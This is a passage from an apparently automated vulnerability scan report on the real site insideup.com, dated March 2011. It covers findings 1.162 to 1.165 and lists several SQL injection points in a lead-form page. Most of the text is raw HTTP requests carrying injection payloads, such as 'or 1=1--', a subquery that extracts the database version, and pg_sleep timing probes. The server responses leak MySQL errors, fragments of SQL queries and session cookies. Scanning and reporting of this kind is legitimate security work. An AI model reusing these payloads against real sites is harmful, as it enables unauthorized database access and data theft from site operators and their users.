ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1' at line 5

Request 2

GET /ppc/leadflow/cace00''/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:10:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lh6rredkino27ibucbekmgua23; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00''/project.php was not found on this server.</p>

1.162. http://www.insideup.com/ppc/leadflow/cace00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10532270'%20or%201%3d1--%20 and 10532270'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace0010532270'%20or%201%3d1--%20/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:48:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'd
...[SNIP]...

Request 2

GET /ppc/leadflow/cace0010532270'%20or%201%3d2--%20/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 03:48:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace0010532270' or 1=2-- /project.php was not found on this server.</p>

1.163. http://www.insideup.com/ppc/leadflow/cace00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16588561'%20or%201%3d1--%20 and 16588561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php16588561'%20or%201%3d1--%20?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'd
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php16588561'%20or%201%3d2--%20?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:15:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php16588561' or 1=2-- was not found on this server.</p>

1.164. http://www.insideup.com/ppc/leadflow/cace00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php'?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:10:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o9ah0i0u6ojlaivqg7elrl6bb1; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php''?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:10:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ng96uq9hof4hqa0a1mtlvsepu3; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php'' was not found on this server.</p>

1.165. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payloads 12216678'%20or%201%3d1--%20 and 12216678'%20or%201%3d2--%20 were each submitted in the attributeId_342_g parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance12216678'%20or%201%3d1--%20&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:37:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance12216678'%20or%201%3d2--%20&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
